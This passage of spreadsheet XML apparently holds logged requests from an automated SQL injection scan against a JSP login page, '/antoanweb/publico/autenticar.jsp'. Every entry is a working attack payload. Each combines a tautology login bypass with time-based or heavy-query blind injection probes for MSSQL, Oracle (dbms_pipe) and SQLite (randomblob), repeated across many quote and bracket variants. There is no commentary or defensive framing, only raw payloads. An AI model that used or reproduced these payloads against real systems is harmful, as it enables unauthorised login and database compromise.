    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2111&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8430')or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and('dlys'like'dlys&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9889&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5025'))or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(('ionl'like'ionl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6835&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3353')))or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((('tfku'like'tfku&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5593&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3524'or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and'iksu'like'iksu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2896&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8473")or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and("szyj"="szyj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1402&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2039"))or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(("gxtb"="gxtb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1493&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9903")))or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((("ewgb"="ewgb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1161&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3724"or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and"vgho"="vgho&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9159&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6966")or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and("qjyr"like"qjyr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4173"))or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(("mbui"like"mbui&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3386&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6127")))or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((("azht"like"azht&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9717&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1146"or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and"hekq"like"hekq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9850&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1375)or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2784&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3501')or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2374&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7557'or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1742&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8755"or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4853&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3118)or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and(6859=6859&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2512&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8175))or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and((489=489&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8070&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9655)))or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and(((6548=6548&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3801&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4776or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7805&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1229')or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and('pcyp'='pcyp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6290&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-294'))or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and(('cqqx'='cqqx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2420&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-58')))or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and((('ktxj'='ktxj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1156&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2198'or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and'iysg'='iysg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6884&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5730')or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and('jmph'like'jmph&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2927&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7269'))or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and(('pqfn'like'pqfn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5834&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1734')))or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and((('fbty'like'fbty&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8895&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6933'or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and'itlf'like'itlf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5508&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6471")or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and("cete"="cete&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9505&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9885"))or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and(("ihdu"="ihdu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8863&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4816")))or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and((("gvrf"="gvrf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5506&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7530"or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and"gpgh"="gpgh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9374&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2145")or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and("zssx"like"zssx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9178&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4180"))or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and(("trod"like"trod&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8331&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7238")))or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and((("xnwm"like"xnwm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6484&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5476"or2018=dbms_pipe.receive_message(chr(97)||chr(108)||chr(112)||chr(98),5)and"gaap"like"gaap&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6706&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3954)or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1251&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3018')or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1244&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3356'or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9048&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1672"or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4795&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4990)or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(4911=4911&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3534&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8013))or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((2514=2514&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5457&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2916)))or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(((9810=9810&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5864&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3437or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9368')or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and('adrg'='adrg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8977&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6695'))or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(('njgp'='njgp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7691&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7610')))or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((('kxrb'='kxrb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7859&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9118'or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and'dorb'='dorb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-765&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5291')or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and('kpmb'like'kpmb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2060&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6259'))or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(('dprb'like'dprb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5071&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8733')))or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((('ntoy'like'ntoy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4350&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9834'or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and'dxux'like'dxux&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1495&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2054")or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and("tftj"="tftj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9116"))or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(("iybc"="iybc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2867&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5132")))or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((("pqlh"="pqlh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5450&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4061"or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and"afry"="afry&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9490&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4297")or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and("ihyy"like"ihyy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6395&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1897"))or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(("qdes"like"qdes&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2086&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5364")))or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((("cqaq"like"cqaq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3515&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8541"or4596=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and"nxjp"like"nxjp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6948&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7923)or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1416&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2709')or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6267&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2810'or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6624&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2247"or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5857&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2503)or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(1358=1358&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6797&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7915))or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((2732=2732&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-614&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7596)))or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(((8895=8895&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4682&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1250or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2527&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6023')or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and('amal'='amal&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-335&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6852'))or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(('fygc'='fygc&amp;modo=entrar</t>
  </si>
  <si>
